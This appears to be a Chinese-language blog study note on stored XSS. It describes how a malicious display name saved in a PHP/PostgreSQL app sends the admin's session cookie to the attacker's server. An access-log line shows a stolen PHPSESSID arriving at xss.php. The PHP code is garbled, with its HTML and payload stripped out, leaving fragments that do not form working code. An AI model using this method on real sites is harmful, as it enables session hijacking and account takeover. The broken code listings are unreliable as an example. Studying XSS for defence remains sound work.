XSS学习笔记（二）(存储型XSS，持久型攻击)

持久型XSS攻击就是把攻击数据存进数据库，攻击行为就伴随着攻击数据一直存在，下面找来一个利用持久型攻击获取Session ID，同时向浏览器传送一个cookie，（这里科普一下，即使是使用了session验证的方法，还是需要客户端支持cookie）, cookie会保存会话连接中的数据，Session ID作为会话标识，浏览器的后续请求就会基于后续请求，攻击者可以提供一个攻击链接，用户点击该链接时，向攻击者自己的服务器发送一条保存有session id 的信息，这样就可以窃取到用户的session id,得到用户的登录权限了。

这里是常见的login.php的代码，大致说下执行流程， 根据user_name查找相应的pass_word,然后将用户提供的password与在数据库里的pass_word进行比较，如果验证通过就建立一个user_name的session：

  ";
}
?>

这里还有一个home.php的代码，可以根据登录用户是admin 或者是不同的用户，做一个分权的处理，对admin列出功能菜单，对于其他用户，提供包含输入的框的form,可以在数据库插入新的数据：

";
   echo "List of user's are
";
   $query = "select display_name from $Schema.members where user_name!='admin'";
   $res = pg_query($Connect,$query);
   while($row=pg_fetch_array($res,NULL,PGSQL_ASSOC)) {
    echo "$row[display_name]
";
   }
 }
 else {
 
  /* 在PHP中的语法都是双引号和单引号还有关键括号都需要"\"转义 */
  echo "
";
  echo "Update display name:";
  echo "";
 }
}
}
?>

攻击者可以通过一个普通用户登录进来，然后在输入框中提交以下数据（在没被过滤的情况下）：

美女admin 

这样根据home.php的过滤条件，如果是admin账户，就会显示含有"美女admin"的列表，然后如果是点击了"美女admin" 的链接，他cookie就可以被收集到我的服务器上（这里是被动式的触发的漏洞，具有一定的猥琐性），搭建的XSS平台一定也有挺多的简单方法，最简单的就是在Apache的access.log中查看，类似的日志是：
172.29.32.182 - - [17/Apr/2014:15:46:18 +0800] "GET /favicon.ico HTTP/1.1" 404 1675
172.23.10.11 - - [19/Apr/2014:15:20:42 +0800] "GET / HTTP/1.1" 200 7859
172.23.10.11 - - [19/Apr/2014:15:20:42 +0800] "HEAD /qweiop43809442fsfjflr.html HTTP/1.1" 404 -
172.23.10.11 - - [19/Apr/2014:15:20:43 +0800] "GET / HTTP/1.1" 200 7859
172.23.10.110 - - [19/Apr/2014:15:20:43 +0800] "GET  /xss.php?c=PHPSESSID%3Dvmcsjsgear6gsogpu7o2imr9f3 200 38          ------ 一次记录的XSS信息，包括目标IP和目标网页以及cookie

有了该攻击者的session-id， 攻击者在会话有效期内即可获得admin的用户权限，并且由于攻击数据已经在数据库，所以只要不删除数据库里的记录，还是会有可能受到攻击，是属于持久性的。其实这里的钓鱼邮件等都是利用这种简单的方法来实现的的，这里的猥琐方法有很多，这里就说这点吧。